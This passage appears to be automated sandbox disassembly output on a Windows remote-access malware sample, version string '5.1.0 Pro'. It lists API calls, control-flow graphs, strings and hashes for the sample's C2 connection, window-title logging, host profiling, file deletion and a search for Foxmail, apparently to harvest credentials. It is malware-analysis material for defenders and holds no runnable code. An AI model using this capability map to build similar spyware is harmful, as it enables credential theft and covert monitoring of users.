                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                    • String ID: 5.1.0 Pro$override$pth_unenc
                                                                    • API String ID: 2281282204-182549033
                                                                    • Opcode ID: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                    • Opcode Fuzzy Hash: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                    Strings
                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$EventLocalThreadTime
                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                    • API String ID: 2532271599-1507639952
                                                                    • Opcode ID: 9be3b9cd4f1e69574a077c84422ddbca642c9eab9663484e0004004cf1949375
                                                                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                    • Opcode Fuzzy Hash: 9be3b9cd4f1e69574a077c84422ddbca642c9eab9663484e0004004cf1949375
                                                                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                    APIs
                                                                    • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Name$ComputerUser
                                                                    • String ID:
                                                                    • API String ID: 4229901323-0
                                                                    • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                    • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                    • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 494 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 507 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 494->507 508 414f74-414f7b Sleep 494->508 523 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->523 524 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->524 508->507 577 4150ec-4150f3 523->577 578 4150de-4150ea 523->578 524->523 579 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 577->579 578->579 606 4151d5-4151e3 call 40482d 579->606 607 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 579->607 613 415210-415225 call 404f51 call 4048c8 606->613 614 4151e5-41520b call 402093 * 2 call 41b4ef 606->614 629 415aa3-415ab5 call 404e26 call 4021fa 607->629 613->629 630 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 613->630 614->629 642 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 629->642 643 415add-415ae5 call 401e8d 629->643 694 415380-41538d call 405aa6 630->694 695 415392-4153b9 call 401fab call 4135a6 630->695 642->643 643->523 694->695 701 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 695->701 702 4153bb-4153bd 695->702 947 415a0f-415a16 701->947 702->701 948 415a18-415a1f 947->948 949 415a2a-415a31 947->949 948->949 950 415a21-415a23 948->950 951 415a33-415a38 call 40b051 949->951 952 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 949->952 950->949 951->952 963 415a71-415a7d CreateThread 952->963 964 415a83-415a9e call 401fd8 * 2 call 401f09 952->964 963->964 964->629
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                    • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep$ErrorLastLocalTime
                                                                    • String ID: | $%I64u$0%s$5.1.0 Pro$C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                    • API String ID: 524882891-3029488580
                                                                    • Opcode ID: 4d1dddc37f949621ebf2629ac99c13a0119523470e238544507b5201cdd53389
                                                                    • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                    • Opcode Fuzzy Hash: 4d1dddc37f949621ebf2629ac99c13a0119523470e238544507b5201cdd53389
                                                                    • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 971 412ab4-412afd GetModuleFileNameW call 4020df * 3 978 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 971->978 1003 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 978->1003 1026 412c2b 1003->1026 1027 412c1d-412c25 Sleep 1003->1027 1028 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412ccd 1028->1051 1052 412cbf-412cc7 Sleep 1028->1052 1053 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412d61-412d69 Sleep 1053->1076 1077 412d6f-412d94 1053->1077 1076->1053 1076->1077 1078 412d98-412db4 call 401f04 call 41c485 1077->1078 1083 412db6-412dc5 call 401f04 DeleteFileW 1078->1083 1084 412dcb-412de7 call 401f04 call 41c485 1078->1084 1083->1084 1091 412e04 1084->1091 1092 412de9-412e02 call 401f04 DeleteFileW 1084->1092 1094 412e08-412e24 call 401f04 call 41c485 1091->1094 1092->1094 1100 412e26-412e38 call 401f04 DeleteFileW 1094->1100 1101 412e3e-412e40 1094->1101 1100->1101 1103 412e42-412e44 1101->1103 1104 412e4d-412e58 Sleep 1101->1104 1103->1104 1106 412e46-412e4b 1103->1106 1104->1078 1107 412e5e-412e70 call 406b28 1104->1107 1106->1104 1106->1107 1110 412e72-412e80 call 406b28 1107->1110 1111 412ec6-412ee5 call 401f09 * 3 1107->1111 1110->1111 1117 412e82-412e90 call 406b28 1110->1117 1123 412eea-412f4e call 40b904 call 401f04 call 4020f6 call 41322d call 401f09 call 405b05 1111->1123 1117->1111 1122 412e92-412ebe Sleep call 401f09 * 3 1117->1122 1122->978 1137 412ec4 1122->1137 1143 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1123->1143 1144 4130a8-413151 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 1123->1144 1137->1123 1213 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1183 413156-4131a1 call 401fd8 * 7 1144->1183 1183->1213
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                    • String ID: /stext "$0TG$0TG$NG$NG
                                                                    • API String ID: 1223786279-2576077980
                                                                    • Opcode ID: 0e05e4ea8403bba91cfa80dff27d7817f1fd6eac90b62577a8af2f8b38c2b719
                                                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                    • Opcode Fuzzy Hash: 0e05e4ea8403bba91cfa80dff27d7817f1fd6eac90b62577a8af2f8b38c2b719
                                                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                      • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                      • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                      • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                      • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                    • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                    • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                    • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                    • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                    • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                    • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                    • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                    • API String ID: 672098462-2938083778
                                                                    • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                    • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                    • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                    • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                    • String ID: 0%s$hdF$pQG$pQG$PG$PG
                                                                    • API String ID: 3795512280-2499586903
                                                                    • Opcode ID: 91f6b9c06e9d4844e7c32ad32402956a2a8adfe33dd1ba7976fb2e6f12053f73
                                                                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                    • Opcode Fuzzy Hash: 91f6b9c06e9d4844e7c32ad32402956a2a8adfe33dd1ba7976fb2e6f12053f73
                                                                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1384 4048c8-4048e8 connect 1385 404a1b-404a1f 1384->1385 1386 4048ee-4048f1 1384->1386 1389 404a21-404a2f WSAGetLastError 1385->1389 1390 404a97 1385->1390 1387 404a17-404a19 1386->1387 1388 4048f7-4048fa 1386->1388 1391 404a99-404a9e 1387->1391 1392 404926-404930 call 420c60 1388->1392 1393 4048fc-404923 call 40531e call 402093 call 41b4ef 1388->1393 1389->1390 1394 404a31-404a34 1389->1394 1390->1391 1406 404941-40494e call 420e8f 1392->1406 1407 404932-40493c 1392->1407 1393->1392 1396 404a71-404a76 1394->1396 1397 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1394->1397 1399 404a7b-404a94 call 402093 * 2 call 41b4ef 1396->1399 1397->1390 1399->1390 1416 404950-404973 call 402093 * 2 call 41b4ef 1406->1416 1417 404987-404992 call 421a40 1406->1417 1407->1399 1446 404976-404982 call 420ca0 1416->1446 1430 4049c4-4049d1 call 420e06 1417->1430 1431 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1417->1431 1443 4049d3-4049f6 call 402093 * 2 call 41b4ef 1430->1443 1444 4049f9-404a14 CreateEventW * 2 1430->1444 1431->1446 1443->1444 1444->1387 1446->1390
                                                                    APIs
                                                                    • connect.WS2_32(FFFFFFFF,007521A8,00000010), ref: 004048E0
                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                    • API String ID: 994465650-2151626615
                                                                    • Opcode ID: 19932798ed07d1ae22d126be326c9da79f3bb29c47122c8f9a0e48a384f387e3
                                                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                    • Opcode Fuzzy Hash: 19932798ed07d1ae22d126be326c9da79f3bb29c47122c8f9a0e48a384f387e3
                                                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                                    • GetForegroundWindow.USER32 ref: 0040AD49
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                    • API String ID: 911427763-3954389425
                                                                    • Opcode ID: 37ff07255512b4315bd6f69a9bd6da697aaeecbf4c9acc604de17f3e83efed60
                                                                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                                    • Opcode Fuzzy Hash: 37ff07255512b4315bd6f69a9bd6da697aaeecbf4c9acc604de17f3e83efed60
                                                                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1539 40da34-40da59 call 401f86 1542 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1539->1542 1543 40da5f 1539->1543 1545 40da70-40da7e call 41b5b4 call 401f13 1543->1545 1546 40da91-40da96 1543->1546 1547 40db51-40db56 1543->1547 1548 40daa5-40daac call 41bfb7 1543->1548 1549 40da66-40da6b 1543->1549 1550 40db58-40db5d 1543->1550 1551 40da9b-40daa0 1543->1551 1552 40db6e 1543->1552 1553 40db5f-40db6c call 43c0cf 1543->1553 1574 40da83 1545->1574 1555 40db73 call 43c0cf 1546->1555 1547->1555 1565 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1548->1565 1566 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1548->1566 1549->1555 1550->1555 1551->1555 1552->1555 1553->1552 1567 40db79-40db7e call 409057 1553->1567 1568 40db78 1555->1568 1565->1574 1575 40da87-40da8c call 401f09 1566->1575 1567->1542 1568->1567 1574->1575 1575->1542
                                                                    APIs
                                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                                                    Strings
